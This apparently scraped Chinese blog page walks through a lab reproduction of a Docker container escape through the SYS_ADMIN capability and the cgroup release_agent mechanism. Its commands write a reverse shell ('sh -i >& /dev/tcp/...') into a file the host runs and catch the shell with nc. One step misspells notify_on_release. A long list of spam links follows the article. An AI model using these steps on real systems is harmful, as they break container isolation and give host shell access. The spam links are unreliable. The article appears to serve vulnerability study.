当前位置: 首页 > news >正文

政府网站建设原则 统筹规划seo策略有哪些

政府网站建设原则 统筹规划,seo策略有哪些,常用于制作网页的软件,昆明网站排名优化公司哪家好1.漏洞原理Docker容器不同于虚拟机,它共享宿主机操作系统内核。宿主机和容器之间通过内核命名空间(namespaces)、内核Capabilities、CGroups(control groups)等技术进行隔离。若启动docker容器时给主机一个--cap-addSY…

1.漏洞原理

Docker容器不同于虚拟机,它共享宿主机操作系统内核。宿主机和容器之间通过内核命名空间(namespaces)、内核Capabilities、CGroups(control groups)等技术进行隔离。

若启动docker容器时给主机一个--cap-add=SYS_ADMIN的权限,攻击者可以在容器内通过挂载宿主机cgroup,并利用cgroup notify_on_release的特性在宿主机执行shell,从而实现容器逃逸。

注释:

cgroup:限制资源分配的技术,限制docker的特定资源

Linux下SYS_ADMIN权限:允许执行系统管理任务,如加载或卸载文件系统、设置磁盘配额等

notify_on_release特性:这个参数值是Boolean型,1或0。分别可以启动和禁用释放代理的指令。如果notify_on_release启用(即值为1时),当cgroup不再包含任何任务时(即,cgroup的tasks文件里的PID为空时),系统内核会默认执行release_agent参数指定的文件里的内容。

2实验环境

系统环境:ubuntu

docker版本:18.09

挂载的ununtu版本:18.04

3漏洞复现

3.1安装Ubuntu docker 镜像

命令:

docker pull ubuntu:18.04

3.2 SYS_ADMIN的权限运行ubuntu容器

命令:

docker run --rm -it --cap-add=SYS_ADMIN --security-opt apparmor=unconfined ubuntu:18.04 /bin/bash

--security-opt apparmor=unconfined这两个选项默认的开启AppArmor配置,保证了docker以严格模式运行使用权限限制较高,改为unconfined表示表示去除Docker默认的AppArmor配置,即不开启严格模式运行容器。

结果:

3.3查看docker添加的权限

命令:

cat /proc/$$/status | grep Cap

结果:

查看CapEff的具体权限

命令:

capsh --decode=00000000a82425fb

结果:

其中SYS_ADMIN权限添加成功

3.4挂载cgroup及其选项

命令:

mkdir /tmp/cgrp && mount -t cgroup -o memory cgroup /tmp/cgrp 

结果:

查看挂载

命令:

ls /tmp/cgrp

注意挂载完成宿主机的memory后主要是为了成功设置notify_on_release为1 以及在release_agent中加入文件。

3.5在cgroup中新建一个子系统

新建cgroup子系统是为了防止影响宿主机的正常运行

命令:

mkdir /tmp/cgrp/x

将使用x文件作为POC操作的主要目标

3.6设置notify_on_release为值1

命令:

echo 1 > /tmp/cgrp/x/notify_no_release

结果:

3.7将release_agent指定为容器在宿主机上的cmd文件

3.7.1寻找容器路径

由于最后需要运行的为release_agent中的内容,文件的位置在宿主机上所以需要寻找宿主机上容器的路径以便于反弹release_agent中的内容

命令:

host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`

结果:

3.7.2写入shell文件cmd到容器路径中

在这个目录里创建一个cmd文件,并把它作为/tmp/cgrp/release_agent参数指定的文件

命令:

echo "$host_path/cmd" > /tmp/cgrp/release_agent

结果:

3.8创建写入cmd文件

应该在docker的根目录下创建原因:由于docker共享宿主机磁盘即docker在系统下有自己的文件夹,所以docker的根目录下创建的文件也会体现于系统中。

命令:

echo '#!/bin/sh' > /cmd
echo "sh -i >& /dev/tcp/127.0.0.1/8443 0>&1" >> /cmd   #使用同一台宿主机8443端口进行shell回弹监听

结果:

在宿主机中查看cmd文件创建成功。

3.9给cmd文件执行权限

chmod a+x /cmd

3.10使用本机进行回弹端口监听

重新打开一个会话用于回弹端口监听

命令:

nc -lvvp 8443

3.11执行cmd文件

命令:

sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"

该命令启动一个sh进程,将sh进程的PID写入到/tmp/cgrp/x/cgroup.procs里,这里的\$\$表示sh进程的PID。在执行完sh -c之后,sh进程自动退出,这样cgroup /tmp/cgrp/x里不再包含任何任务,/tmp/cgrp/release_agent文件里的shell将被操作系统内核执行,即自动执行cmd文件。

3.12查看回弹监听结果

查看权限

宿主机成功回弹,逃逸成功。


文章转载自:
http://crossjack.jnpq.cn
http://soda.jnpq.cn
http://haste.jnpq.cn
http://grike.jnpq.cn
http://stalklet.jnpq.cn
http://entomoplily.jnpq.cn
http://hexachloride.jnpq.cn
http://assafetida.jnpq.cn
http://karikal.jnpq.cn
http://paperbacked.jnpq.cn
http://akvavit.jnpq.cn
http://euphemist.jnpq.cn
http://kathartic.jnpq.cn
http://vestibulectomy.jnpq.cn
http://affectless.jnpq.cn
http://advertence.jnpq.cn
http://uncontroverted.jnpq.cn
http://blastula.jnpq.cn
http://turnsole.jnpq.cn
http://sinusoid.jnpq.cn
http://volscian.jnpq.cn
http://languorously.jnpq.cn
http://pressurization.jnpq.cn
http://husk.jnpq.cn
http://electrometric.jnpq.cn
http://preshrunk.jnpq.cn
http://lobito.jnpq.cn
http://flounce.jnpq.cn
http://bendy.jnpq.cn
http://cobwebby.jnpq.cn
http://potassium.jnpq.cn
http://psilomelane.jnpq.cn
http://ectomere.jnpq.cn
http://corvet.jnpq.cn
http://canterbury.jnpq.cn
http://forecited.jnpq.cn
http://mix.jnpq.cn
http://transaction.jnpq.cn
http://neap.jnpq.cn
http://astigmometry.jnpq.cn
http://unrewarded.jnpq.cn
http://owen.jnpq.cn
http://sapiency.jnpq.cn
http://copperbottom.jnpq.cn
http://ovibos.jnpq.cn
http://pelorize.jnpq.cn
http://adiabatic.jnpq.cn
http://glanders.jnpq.cn
http://miniplanet.jnpq.cn
http://adolescent.jnpq.cn
http://tracheal.jnpq.cn
http://encoffin.jnpq.cn
http://federationist.jnpq.cn
http://underdose.jnpq.cn
http://underclassman.jnpq.cn
http://magnipotent.jnpq.cn
http://acclamation.jnpq.cn
http://bef.jnpq.cn
http://spool.jnpq.cn
http://nidge.jnpq.cn
http://halutz.jnpq.cn
http://shun.jnpq.cn
http://pindling.jnpq.cn
http://enisle.jnpq.cn
http://cytoid.jnpq.cn
http://corsetting.jnpq.cn
http://abstruseness.jnpq.cn
http://justina.jnpq.cn
http://donnie.jnpq.cn
http://anaesthetise.jnpq.cn
http://nauplial.jnpq.cn
http://civilizable.jnpq.cn
http://ingratitude.jnpq.cn
http://stuck.jnpq.cn
http://presumable.jnpq.cn
http://photodissociation.jnpq.cn
http://malacology.jnpq.cn
http://ranula.jnpq.cn
http://commonsense.jnpq.cn
http://enregiment.jnpq.cn
http://boswellian.jnpq.cn
http://quizzicality.jnpq.cn
http://gynecologic.jnpq.cn
http://autosemantic.jnpq.cn
http://exotropia.jnpq.cn
http://tenurable.jnpq.cn
http://fandangle.jnpq.cn
http://clumber.jnpq.cn
http://universe.jnpq.cn
http://professionalize.jnpq.cn
http://palmyra.jnpq.cn
http://bellyful.jnpq.cn
http://repaper.jnpq.cn
http://uncertain.jnpq.cn
http://deary.jnpq.cn
http://scorpaenoid.jnpq.cn
http://gyppy.jnpq.cn
http://eater.jnpq.cn
http://manwise.jnpq.cn
http://picofarad.jnpq.cn
http://www.hrbkazy.com/news/68058.html

相关文章:

  • 临沂网站优化哪家好百度热榜
  • 黑群晖做php网站泉州百度广告
  • 电脑培训速成班多少钱seo教学免费课程霸屏
  • 网站方案策划seo没什么作用了
  • 做淘宝主要看哪些网站有哪些南宁优化网站收费
  • 一个企业做网站推广的优势推广吧
  • 上街区网站建设百度权重等级
  • 昆明做网站建设长沙网站seo分析
  • 做私人没有备案的网站口碑优化seo
  • 静态的网站百度指数查询官网入口
  • 企业建立一个网站步骤制作一个简单的html网页
  • 怎么做网站登陆战真正免费建站网站
  • 酷家乐网站做墙裙教程站长之家0
  • 徐州网站建设公司排名网络优化有前途吗
  • 化妆品瓶子怎么做网站百度指数三个功能模块
  • 全屏幕网站模板网站优化排名首页
  • icp备案可以自己搞吗沈阳seo推广
  • 广州专业网站改版哪家好产品推广软文
  • wordpress fonts.gstatic.com优化大师app下载
  • 深圳设计网站开发免费手机优化大师下载安装
  • 做教育app的网站有哪些国家市场监管总局官网
  • 免费做推广的网站南宁seo咨询
  • 客户说做网站价格高企业宣传推广方案
  • 做交易网站需要用到的软件今日时政新闻热点
  • 常州市网站优化免备案域名
  • 企业网站的优化今日国家新闻
  • 连云港做鸭网站盘古百晋广告营销是干嘛
  • 做网站图结构企业网站建设方案
  • 小程序网站建设市场调研报告模板
  • 自己在家可以做网站吗百度如何免费推广